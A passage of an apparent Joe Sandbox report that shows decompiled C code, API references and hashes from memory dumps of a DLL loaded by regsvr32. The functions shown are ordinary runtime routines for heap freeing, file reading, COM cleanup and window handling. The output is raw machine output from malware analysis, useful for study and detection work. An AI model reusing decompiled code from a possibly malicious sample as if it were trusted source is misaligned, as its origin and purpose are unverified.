					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x10018f1b
0x10018f23
0x10018f3a
0x10018ee2
0x10018eeb
0x10018ef7
0x10018efa
0x10018f00
0x10018f06
0x10018f0b
0x10018f15
0x10018f0d
0x10018f11
0x10018f11
0x10018f25
0x10018f2b
0x10018f33
0x00000000
0x10018f35
0x10018f35
0x10018f39
0x10018f39
0x10018f33

APIs

GetModuleHandleA.KERNEL32(KERNEL32,100132A6), ref: 10018F1B
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 10018F2B

Strings

KERNEL32, xrefs: 10018F16
IsProcessorFeaturePresent, xrefs: 10018F25

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 84d8b145f530cb8c138a2747299701ee52cd4c12d2a6971b5621ca1a725f1d01
Instruction ID: 1bee355d24f708520efd17075276de4fa12d24f3c42a4f7eeaabd267be092e47
Opcode Fuzzy Hash: 84d8b145f530cb8c138a2747299701ee52cd4c12d2a6971b5621ca1a725f1d01
Instruction Fuzzy Hash: 66C01220658602D1E95097A10C48B191198FB147C2F500428A906E8050CF20C74D9620

Uniqueness

Uniqueness Score: -1.00%

Function 100045C0 Relevance: 6.2, APIs: 4, Instructions: 202
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E100045C0() {
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t66;
				intOrPtr _t69;
				signed int _t70;
				void* _t72;
				signed int _t94;
				signed int _t95;
				intOrPtr _t104;
				signed int _t110;
				signed int _t115;
				signed int _t118;
				signed int _t120;
				signed int _t124;
				signed int _t125;
				signed int _t128;
				signed int _t137;
				void* _t147;
				signed int _t148;
				intOrPtr _t149;
				signed int _t154;
				signed int _t155;
				signed int _t157;
				void* _t162;
				void* _t163;
				void* _t209;
				void* _t210;

				_t162 =  *(_t209 + 8);
				if(_t162 != 0) {
					_t2 = _t162 + 0x10; // 0xdb852858
					if( *_t2 != 0) {
						_t3 = _t162 + 4; // 0xc0335d5e
						_t69 =  *_t3;
						_t124 =  *0x1003611c; // 0x0
						_t70 =  *0x1003610c; // 0x0
						 *((intOrPtr*)( *((intOrPtr*)( *_t162 + 0x28)) + _t69 + _t124 + _t70))(_t69, 0, 0);
					}
					_t110 =  *0x10036120; // 0x0
					_t125 =  *0x1003610c; // 0x0
					_t51 =  *0x10036118; // 0x0
					_t148 =  *0x10036114; // 0x0
					_t53 =  *0x10036110; // 0x0
					_t10 = _t53 * 2; // 0x3
					_t12 = _t162 + 0x30; // 0x8b100361
					 *0x10038154( *_t12 + ((_t110 - _t125 - 1) * _t51 +  *0x1003611c + (_t148 - _t110) * 2 + ((_t110 - _t125 - 1) * _t51 +  *0x1003611c + (_t148 - _t110) * 2) * 2 + ((3 - _t51 * _t125 + _t51 * _t125 * 2) * _t148 + _t53 + _t10 + 3) * _t53) * 8, _t147, _t163, _t72);
					_t17 = _t162 + 8; // 0x4cc4835b
					_t210 = _t209 + 4;
					if( *_t17 == 0) {
						L9:
						_t43 = _t162 + 4; // 0xc0335d5e
						_t149 =  *_t43;
						if(_t149 != 0) {
							_t44 = _t162 + 0x34; // 0xc2af0fc1
							_t128 =  *0x10036118; // 0x0
							_t115 =  *0x1003610c; // 0x0
							_t60 =  *0x10036120; // 0x0
							_t47 = _t60 + 1; // 0x1
							_t61 =  *0x1003611c; // 0x0
							 *((intOrPtr*)(_t162 + 0x20))(_t149, 0, ((_t128 | 0xffffffff) - _t115) *  *0x10036110 - (_t60 * _t128 +  *0x1003611c + _t115 * _t115 + 3) * _t128 + _t47 * _t60 -  *0x10036114 - _t61 + 0x8000,  *_t44);
						}
						return HeapFree(GetProcessHeap(), 0, _t162);
					} else {
						_t63 =  *0x1003611c; // 0x0
						_t118 =  *0x10036120; // 0x0
						_t137 =  *0x10036118; // 0x0
						_t120 =  *0x1003610c; // 0x0
						_t154 =  *0x10036120; // 0x0
						_t18 = _t162 + 0xc; // 0x8b068bc3
						_t94 =  *0x10036114; // 0x0
						 *(_t210 + 0x14) = 0;
						if((_t137 - _t118 * _t63 -  *0x10036110 - 1) * _t137 + (_t120 - _t63 * _t63 * _t120 + 1) * _t154 - _t63 +  *_t18 +  *0x10036110 + _t94 + _t120 <= 0) {
							L8:
							_t95 =  *0x10036110; // 0x0
							_t40 = _t162 + 8; // 0x4cc4835b
							 *0x10038154( *_t40 + (_t137 - _t63 + _t63 * 2 - _t95 + _t120) * 4);
							_t210 = _t210 + 4;
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t155 =  *0x10036114; // 0x0
							_t157 =  *0x10036120; // 0x0
							_t25 = _t162 + 8; // 0x4cc4835b
							_t104 =  *_t25;
							if( *((intOrPtr*)(_t104 + ( *(_t210 + 0x14) + ((_t94 - _t137 * _t120 + 1) * _t63 + (1 - _t154) *  *0x10036110 - _t155 + _t155 - _t157 + _t157 * 2 - _t137 + _t120) * 2) * 4)) != 0) {
								_t28 = _t162 + 0x34; // 0xc2af0fc1
								_t66 =  *0x10036114; // 0x0
								 *((intOrPtr*)(_t162 + 0x2c))( *((intOrPtr*)(_t104 + ((1 - _t63) *  *0x10036110 + _t66 * _t120 - _t157 + _t157 + _t137 +  *((intOrPtr*)(_t210 + 0x18))) * 4)),  *_t28);
								_t120 =  *0x1003610c; // 0x0
								_t63 =  *0x1003611c; // 0x0
								_t137 =  *0x10036118; // 0x0
								_t157 =  *0x10036120; // 0x0
								_t210 = _t210 + 8;
							}
							 *(_t210 + 0x14) =  *(_t210 + 0x14) + 1;
							_t154 =  *0x10036120; // 0x0
							_t36 = _t162 + 0xc; // 0x8b068bc3
							_t94 =  *0x10036114; // 0x0
						} while ( *(_t210 + 0x14) < (_t137 - _t157 * _t63 -  *0x10036110 - 1) * _t137 + (_t120 - _t63 * _t63 * _t120 + 1) * _t154 - _t63 +  *_t36 +  *0x10036110 + _t94 + _t120);
						goto L8;
					}
				}
				return _t49;
			}

0x100045c1
0x100045c7
0x100045cd
0x100045d2
0x100045d6
0x100045d6
0x100045dc
0x100045e9
0x100045f2
0x100045f2
0x100045f4
0x100045fa
0x10004600
0x10004613
0x10004629
0x10004638
0x10004641
0x1000464d
0x10004653
0x10004656
0x1000465b
0x100047c7
0x100047c7
0x100047c7
0x100047cc
0x100047ce
0x100047d1
0x100047d7
0x100047de
0x10004806
0x1000480c
0x10004827
0x1000482a
0x00000000
0x10004661
0x10004661
0x10004666
0x1000466c
0x10004684
0x10004695
0x100046a1
0x100046ae
0x100046ba
0x100046c2
0x100047a8
0x100047a8
0x100047b7
0x100047be
0x100047c4
0x00000000
0x00000000
0x00000000
0x00000000
0x100046c8
0x100046c8
0x100046e1
0x100046ed
0x10004704
0x10004704
0x1000470b
0x1000470d
0x1000471f
0x10004738
0x1000473b
0x10004741
0x10004746
0x1000474c
0x10004752
0x10004752
0x1000475d
0x1000477b
0x10004787
0x10004794
0x1000479e
0x00000000
0x100046c8
0x1000465b
0x10004841

APIs

??3@YAXPAX@Z.MSVCRT ref: 1000464D
??3@YAXPAX@Z.MSVCRT ref: 100047BE
GetProcessHeap.KERNEL32(00000000,10005AAE), ref: 10004830
HeapFree.KERNEL32(00000000), ref: 10004837

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ??3@Heap$FreeProcess
String ID:
API String ID: 834397476-0
Opcode ID: 90c6ab159d29352df5b5bb154c862e06b96acb7d9c6baf81e13f869300bda1ee
Instruction ID: ad28b38bd3c08bbb3fc4f9e0d514c77970a45c35d1c704a94450a7462f44718a
Opcode Fuzzy Hash: 90c6ab159d29352df5b5bb154c862e06b96acb7d9c6baf81e13f869300bda1ee
Instruction Fuzzy Hash: F771B6716403198FD309DFA8CEC6A51B7A9F78E200F09C539D9018F3A7EAB4B905CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1000ED7C Relevance: 6.2, APIs: 4, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E1000ED7C(intOrPtr __ecx, intOrPtr* __edi) {
				void* __ebx;
				void* __esi;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t91;
				intOrPtr _t104;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t148;
				intOrPtr* _t161;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				intOrPtr _t167;
				intOrPtr* _t168;
				void* _t170;
				intOrPtr _t183;

				_t161 = __edi;
				E10011A8C(E1002ACBA, _t170);
				_t167 = __ecx;
				 *((intOrPtr*)(_t170 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1002d9e4;
				 *(_t170 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t121 =  *((intOrPtr*)(__ecx + 0x50));
					if(_t121 != 0) {
						_t122 =  *_t121;
						_push(_t170 - 0x14);
						_push(0x1002fca8);
						_push(_t122);
						if( *((intOrPtr*)( *_t122))() >= 0) {
							_t124 =  *((intOrPtr*)(_t170 - 0x14));
							_push(_t170 - 0x10);
							_push(0x1002fde8);
							 *((intOrPtr*)(_t170 - 0x10)) = 0;
							_push(_t124);
							if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
								_t128 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
								_t130 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t130 + 8))(_t130);
							}
							_t126 =  *((intOrPtr*)(_t170 - 0x14));
							 *((intOrPtr*)( *_t126 + 8))(_t126);
						}
					}
				}
				_push(_t161);
				L8:
				if( *((intOrPtr*)(_t167 + 0x24)) != 0) {
					_t161 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x1c)) + 8));
					 *((intOrPtr*)( *((intOrPtr*)( *_t161)) + 0xbc))( *((intOrPtr*)(_t161 + 8)), 0);
					 *((intOrPtr*)( *_t161 + 0x94)) = 0;
					goto L8;
				}
				 *((intOrPtr*)(_t170 - 0x18)) = _t167 + 0x18;
				E1001D876(_t167 + 0x18);
				if( *((intOrPtr*)(_t167 + 0x40)) == 0) {
					L16:
					_t87 =  *((intOrPtr*)(_t167 + 8));
					if(_t87 != 0) {
						 *((intOrPtr*)( *_t87 + 8))(_t87);
					}
					_t88 =  *((intOrPtr*)(_t167 + 0xc));
					if(_t88 != 0) {
						 *((intOrPtr*)( *_t88 + 8))(_t88);
					}
					if( *((intOrPtr*)(_t167 + 0x14)) == 0) {
						L29:
						_t89 =  *((intOrPtr*)(_t167 + 0x34));
						if(_t89 != 0) {
							__imp__CoTaskMemFree(_t89);
						}
						_t138 =  *((intOrPtr*)(_t167 + 0x54));
						if( *((intOrPtr*)(_t167 + 0x54)) != 0) {
							E1000DE59(_t138, _t161,  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x50)))));
							E1000A27F( *((intOrPtr*)(_t167 + 0x54)));
						}
						_t162 =  *((intOrPtr*)(_t167 + 0x54));
						_t195 = _t162;
						if(_t162 != 0) {
							E1000A27F(_t162);
							_push(_t162);
							L1001F54A(0, _t162, _t167, _t195);
						}
						_t163 =  *((intOrPtr*)(_t167 + 0x50));
						_t196 = _t163;
						if(_t163 != 0) {
							E1000EAFE(_t163, _t196);
							_push(_t163);
							L1001F54A(0, _t163, _t167, _t196);
						}
						_t90 =  *((intOrPtr*)(_t167 + 0x4c));
						if(_t90 != 0) {
							 *((intOrPtr*)( *_t90 + 8))(_t90);
						}
						_t168 =  *((intOrPtr*)(_t167 + 0x48));
						if(_t168 != 0) {
							 *((intOrPtr*)( *_t168 + 8))(_t168);
						}
						 *(_t170 - 4) =  *(_t170 - 4) | 0xffffffff;
						_t91 = E1001D95E( *((intOrPtr*)(_t170 - 0x18)));
						 *[fs:0x0] =  *((intOrPtr*)(_t170 - 0xc));
						return _t91;
					} else {
						 *((intOrPtr*)(_t170 - 0x10)) = 0;
						if( *((intOrPtr*)(_t167 + 0x10)) <= 0) {
							L28:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t167 + 0x14)));
							goto L29;
						}
						_t165 = 0;
						do {
							_t104 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)) + 4));
							 *((intOrPtr*)(_t170 - 0x14)) = _t104;
							if(_t104 == 0) {
								goto L25;
							} else {
								goto L24;
							}
							do {
								L24:
								 *((intOrPtr*)( *((intOrPtr*)(E10007404(_t170 - 0x14))) + 0x94)) = 0;
							} while ( *((intOrPtr*)(_t170 - 0x14)) != 0);
							L25:
							E1001D876( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)));
							_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24));
							if(_t148 != 0) {
								 *((intOrPtr*)( *_t148 + 4))(1);
							}
							 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 1;
							_t165 = _t165 + 0x28;
						} while ( *((intOrPtr*)(_t170 - 0x10)) <  *((intOrPtr*)(_t167 + 0x10)));
						goto L28;
					}
				}
				_t161 = 0;
				if( *((intOrPtr*)(_t167 + 0x38)) <= 0) {
					L14:
					if(_t183 != 0) {
						_push( *((intOrPtr*)(_t167 + 0x3c)));
						L1001F54A(0, _t161, _t167, _t183);
						_push( *((intOrPtr*)(_t167 + 0x40)));
						L1001F54A(0, _t161, _t167, _t183);
					}
					goto L16;
				}
				 *((intOrPtr*)(_t170 - 0x10)) = 0;
				do {
					__imp__#9( *((intOrPtr*)(_t167 + 0x40)) +  *((intOrPtr*)(_t170 - 0x10)));
					 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 0x10;
					_t161 = _t161 + 1;
				} while (_t161 <  *((intOrPtr*)(_t167 + 0x38)));
				_t183 =  *((intOrPtr*)(_t167 + 0x38));
				goto L14;
			}

0x1000ed7c
0x1000ed81
0x1000ed8b
0x1000ed8d
0x1000ed90
0x1000ed9b
0x1000ed9e
0x1000eda0
0x1000eda5
0x1000eda7
0x1000edae
0x1000edaf
0x1000edb4
0x1000edb9
0x1000edbb
0x1000edc1
0x1000edc2
0x1000edc7
0x1000edcc
0x1000edd2
0x1000edd4
0x1000eddd
0x1000ede0
0x1000ede6
0x1000ede6
0x1000ede9
0x1000edef
0x1000edef
0x1000edb9
0x1000eda5
0x1000edf2
0x1000ee11
0x1000ee14
0x1000edf8
0x1000ee03
0x1000ee0b
0x00000000
0x1000ee0b
0x1000ee19
0x1000ee1c
0x1000ee24
0x1000ee5e
0x1000ee5e
0x1000ee63
0x1000ee68
0x1000ee68
0x1000ee6b
0x1000ee70
0x1000ee75
0x1000ee75
0x1000ee7b
0x1000eeea
0x1000eeea
0x1000eeef
0x1000eef2
0x1000eef2
0x1000eef8
0x1000eefd
0x1000ef04
0x1000ef0c
0x1000ef0c
0x1000ef11
0x1000ef14
0x1000ef16
0x1000ef1a
0x1000ef1f
0x1000ef20
0x1000ef25
0x1000ef26
0x1000ef29
0x1000ef2b
0x1000ef2f
0x1000ef34
0x1000ef35
0x1000ef3a
0x1000ef3b
0x1000ef41
0x1000ef46
0x1000ef46
0x1000ef49
0x1000ef4e
0x1000ef53
0x1000ef53
0x1000ef59
0x1000ef5d
0x1000ef67
0x1000ef6f
0x1000ee7d
0x1000ee80
0x1000ee83
0x1000eee1
0x1000eee4
0x00000000
0x1000eee4
0x1000ee85
0x1000ee87
0x1000ee8e
0x1000ee93
0x1000ee96
0x00000000
0x00000000
0x00000000
0x00000000
0x1000ee98
0x1000ee98
0x1000eead
0x1000eead
0x1000eeb5
0x1000eebc
0x1000eec4
0x1000eeca
0x1000eed0
0x1000eed0
0x1000eed3
0x1000eed9
0x1000eedc
0x00000000
0x1000ee87
0x1000ee7b
0x1000ee26
0x1000ee2b
0x1000ee4a
0x1000ee4a
0x1000ee4c
0x1000ee4f
0x1000ee54
0x1000ee57
0x1000ee5d
0x00000000
0x1000ee4a
0x1000ee2d
0x1000ee30
0x1000ee37
0x1000ee3d
0x1000ee41
0x1000ee42
0x1000ee47
0x00000000

APIs

__EH_prolog.LIBCMT ref: 1000ED81
VariantClear.OLEAUT32(?), ref: 1000EE37
CoTaskMemFree.OLE32(?), ref: 1000EEE4
CoTaskMemFree.OLE32(?), ref: 1000EEF2

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeTask$ClearH_prologVariant
String ID:
API String ID: 82050969-0
Opcode ID: afa6c20de34ed5f3fa211c7dbc173508223aefaae08f34650159bba21e88455d
Instruction ID: 23eb7ccec880251b59bab8763a819f9e2e85fb578e8740f3f9367a1fc10412e0
Opcode Fuzzy Hash: afa6c20de34ed5f3fa211c7dbc173508223aefaae08f34650159bba21e88455d
Instruction Fuzzy Hash: 12713875A00696CFDB20DFA8C9C486AB7F2FF48384761096DE146AB665CB31FD81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001B75C Relevance: 6.2, APIs: 4, Instructions: 167
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001B75C(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t79;
				void* _t82;
				signed int _t86;
				signed int* _t89;
				long _t90;
				void* _t92;
				intOrPtr _t93;
				signed int _t97;
				intOrPtr _t98;
				char _t100;
				signed int _t101;
				long _t103;
				long _t106;
				signed int _t107;
				signed int _t113;
				signed int _t114;
				signed char _t117;
				intOrPtr _t118;
				long _t120;
				void* _t124;
				intOrPtr* _t125;
				signed int _t127;
				signed char* _t128;
				void* _t129;
				void* _t130;

				_v12 = _v12 & 0x00000000;
				_t113 = _a8;
				_t124 = _t113;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t79 = _a4;
				_t125 = 0x1003a6c0 + (_t79 >> 5) * 4;
				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
				_t82 =  *_t125 + _t127;
				_t117 =  *((intOrPtr*)(_t82 + 4));
				if((_t117 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
					_a12 = _a12 - 1;
					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
					_t124 = _t113 + 1;
					_v12 = 1;
					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
				}
				if(ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0) != 0) {
					_t86 = _v16;
					_t118 =  *_t125;
					_v12 = _v12 + _t86;
					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t86;
					if(_t86 == 0) {
						L15:
						_t89 =  *_t125 + _t127 + 4;
						 *_t89 =  *_t89 & 0x000000fb;
						__eflags =  *_t89;
						L16:
						_t90 = _a8;
						_t120 = _v12 + _t90;
						__eflags = _t90 - _t120;
						_a12 = _t90;
						_v12 = _t120;
						if(_t90 >= _t120) {
							L40:
							_t114 = _t113 - _a8;
							__eflags = _t114;
							_v12 = _t114;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t92 =  *_a12;
							__eflags = _t92 - 0x1a;
							if(_t92 == 0x1a) {
								break;
							}
							__eflags = _t92 - 0xd;
							if(_t92 == 0xd) {
								__eflags = _a12 - _t120 - 1;
								if(_a12 >= _t120 - 1) {
									_a12 = _a12 + 1;
									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
									__eflags = _t97;
									if(_t97 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t113 = 0xd;
											L35:
											_t113 = _t113 + 1;
											__eflags = _t113;
											L36:
											_t120 = _v12;
											__eflags = _a12 - _t120;
											if(_a12 < _t120) {
												continue;
											}
											goto L40;
										}
										_t98 =  *_t125;
										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
											__eflags = _t113 - _a8;
											if(__eflags != 0) {
												L33:
												E1001A023(__eflags, _a4, 0xffffffff, 1);
												_t130 = _t130 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t113 = 0xa;
											goto L35;
										}
										_t100 = _v5;
										__eflags = _t100 - 0xa;
										if(_t100 == 0xa) {
											goto L32;
										}
										 *_t113 = 0xd;
										 *((char*)( *_t125 + _t127 + 5)) = _t100;
										goto L35;
									}
									_t101 = GetLastError();
									__eflags = _t101;
									if(_t101 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t103 = _a12 + 1;
								__eflags =  *_t103 - 0xa;
								if( *_t103 != 0xa) {
									_a12 = _t103;
									goto L34;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t113 = _t92;
							_t113 = _t113 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t93 =  *_t125;
						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
							_t128 = _t93 + _t127 + 4;
							 *_t128 =  *_t128 | 0x00000002;
							__eflags =  *_t128;
						}
						goto L40;
					}
					__eflags =  *_t113 - 0xa;
					if( *_t113 != 0xa) {
						goto L15;
					}
					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
					goto L16;
				} else {
					_t106 = GetLastError();
					_t129 = 5;
					if(_t106 != _t129) {
						__eflags = _t106 - 0x6d;
						if(_t106 == 0x6d) {
							goto L42;
						}
						_t107 = E10013380(_t106);
						L10:
						return _t107 | 0xffffffff;
					}
					 *((intOrPtr*)(E1001336E())) = 9;
					_t107 = E10013377();
					 *_t107 = _t129;
					goto L10;
				}
			}

0x1001b762
0x1001b76b
0x1001b770
0x1001b772
0x1001b930
0x1001b930
0x00000000
0x1001b930
0x1001b778
0x1001b786
0x1001b78f
0x1001b792
0x1001b794
0x1001b79a
0x00000000
0x00000000
0x1001b7a3
0x1001b7b1
0x1001b7b4
0x1001b7b8
0x1001b7bb
0x1001b7c2
0x1001b7c2
0x1001b7de
0x1001b819
0x1001b81c
0x1001b81e
0x1001b821
0x1001b826
0x1001b92b
0x00000000
0x1001b92b
0x1001b82c
0x1001b82e
0x1001b840
0x1001b842
0x1001b846
0x1001b846
0x1001b849
0x1001b849
0x1001b84f
0x1001b851
0x1001b853
0x1001b856
0x1001b859
0x1001b925
0x1001b925
0x1001b925
0x1001b928
0x00000000
0x00000000
0x00000000
0x00000000
0x1001b85f
0x1001b85f
0x1001b862
0x1001b864
0x1001b866
0x00000000
0x00000000
0x1001b86c
0x1001b86e
0x1001b87c
0x1001b87f
0x1001b895
0x1001b8a9
0x1001b8af
0x1001b8b1
0x1001b8bd
0x1001b8bd
0x1001b8c1
0x1001b903
0x1001b903
0x1001b906
0x1001b906
0x1001b906
0x1001b907
0x1001b907
0x1001b90a
0x1001b90d
0x00000000
0x00000000
0x00000000
0x1001b913
0x1001b8c3
0x1001b8c5
0x1001b8ca
0x1001b8de
0x1001b8e1
0x1001b8ee
0x1001b8f5
0x1001b8fa
0x1001b8fd
0x1001b901
0x00000000
0x00000000
0x00000000
0x1001b901
0x1001b8e3
0x1001b8e7
0x00000000
0x00000000
0x1001b8e9
0x1001b8e9
0x00000000
0x1001b8e9
0x1001b8cc
0x1001b8cf
0x1001b8d1
0x00000000
0x00000000
0x1001b8d3
0x1001b8d8
0x00000000
0x1001b8d8
0x1001b8b3
0x1001b8b9
0x1001b8bb
0x00000000
0x00000000
0x00000000
0x1001b8bb
0x1001b884
0x1001b885
0x1001b888
0x1001b890
0x00000000
0x1001b890
0x1001b88a
0x00000000
0x1001b88a
0x1001b870
0x1001b872
0x1001b873
0x00000000
0x1001b873
0x1001b915
0x1001b917
0x1001b91c
0x1001b91e
0x1001b922
0x1001b922
0x1001b922
0x00000000
0x1001b91c
0x1001b830
0x1001b833
0x00000000
0x00000000
0x1001b83b
0x00000000
0x1001b7e0
0x1001b7e0
0x1001b7e8
0x1001b7eb
0x1001b801
0x1001b804
0x00000000
0x00000000
0x1001b80b
0x1001b811
0x00000000
0x1001b811
0x1001b7f2
0x1001b7f8
0x1001b7fd
0x00000000
0x1001b7fd

APIs

ReadFile.KERNEL32(?,?,?,?,00000000,1002EFE8,?,?), ref: 1001B7D6
GetLastError.KERNEL32 ref: 1001B7E0
ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 1001B8A9
GetLastError.KERNEL32 ref: 1001B8B3

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 7da25d244e6440bd7236263eb551815ef0c0b4a4bf8a5dd15079a7f91dc11e2d
Instruction ID: 0a4bd949ddde782393144a75d5cee989dcea459c0babb1fb25f56f12e98d1827
Opcode Fuzzy Hash: 7da25d244e6440bd7236263eb551815ef0c0b4a4bf8a5dd15079a7f91dc11e2d
Instruction Fuzzy Hash: 1161A130A04B8A9FDB21CF64C880B9D7BF4FF06754F154099E9618F292DB70DA96CB11

Uniqueness

Uniqueness Score: -1.00%

Function 1000E95C Relevance: 6.2, APIs: 4, Instructions: 165
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E1000E95C(intOrPtr* __ecx, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				void* __ebp;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr* _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t84;
				void* _t107;
				void* _t126;
				intOrPtr _t130;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				intOrPtr* _t135;
				intOrPtr* _t136;
				intOrPtr _t137;
				void* _t138;

				_t126 = __edx;
				_t136 = __ecx;
				_t130 = E1002174E( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 0x24)));
				_v12 = _t130;
				_t58 = IsWindowVisible( *(_t130 + 0x1c));
				asm("sbb eax, eax");
				_t60 =  ~_t58 + 1;
				_v24 = _t60;
				_t107 = 0;
				if(_t60 != 0) {
					GetWindowRect( *(E10020A8C(_t138, GetDesktopWindow()) + 0x1c),  &_v56);
					GetWindowRect( *(_t130 + 0x1c),  &_v40);
					asm("cdq");
					asm("cdq");
					E10022A95(_t130, _v56.right - _v56.left - _t126 >> 1, _v56.bottom - _v56.top - _t126 >> 1, _t107, _t107, _t107);
					E10022AD3(_t130, 1);
				}
				_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t136 + 4)) + 0x4c));
				_t131 = _t136 + 0x48;
